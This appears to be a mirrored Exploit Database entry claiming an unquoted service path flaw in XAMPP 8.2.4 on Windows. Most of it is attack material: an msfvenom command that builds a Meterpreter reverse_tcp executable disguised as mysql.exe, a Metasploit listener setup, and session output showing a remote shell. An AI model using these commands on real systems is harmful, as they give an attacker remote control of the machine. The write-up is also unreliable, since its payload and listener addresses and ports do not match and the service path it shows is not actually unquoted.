XAMPP 8.2.4 – Unquoted Path

• Exploit Database
• 38 阅读

• 作者： Andrey Stoykov
  日期： 2023-07-15
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51585/

• # Exploit Title: XAMPP 8.2.4 - Unquoted Path
  # Date: 07/2023
  # Exploit Author: Andrey Stoykov
  # Version: 8.2.4
  # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe
  # Tested on: Windows Server 2022
  # Blog: http://msecureltd.blogspot.com/
  
  
  Steps to Exploit:
  
  1. Search for unquoted paths
  2. Generate meterpreter shell
  3. Copy shell to XAMPP directory replacing "mysql.exe"
  4. Exploit by double clicking on shell
  
  
  C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
  
  mysql mysql C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysqlAuto
  
  
  
  // Generate shell
  msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe 
  
  
  // Setup listener
  msf6 > use exploit/multi/handler
  msf6 exploit(multi/handler) > set lhost 192.168.1.13
  msf6 exploit(multi/handler) > set lport 4443
  msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
  msf6 exploit(multi/handler) > run
  
  
  msf6 exploit(multi/handler) > run
  
  [*] Started reverse TCP handler on 192.168.1.13:4443 
  [*] Sending stage (175686 bytes) to 192.168.1.11
  [*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700
  
  
  meterpreter > getuid
  Server username: WIN-5PT4K404NLO\astoykov
  meterpreter > getpid
  Current pid: 4724
  meterpreter > shell
  Process 5884 created.
  Channel 1 created.
  Microsoft Windows [Version 10.0.20348.1]
  (c) Microsoft Corporation. All rights reserved.
  [...]
  C:\xampp\mysql\bin>dir
  dir
   Volume in drive C has no label.
   Volume Serial Number is 80B5-B405
  
   Directory of C:\xampp\mysql\bin
  [...]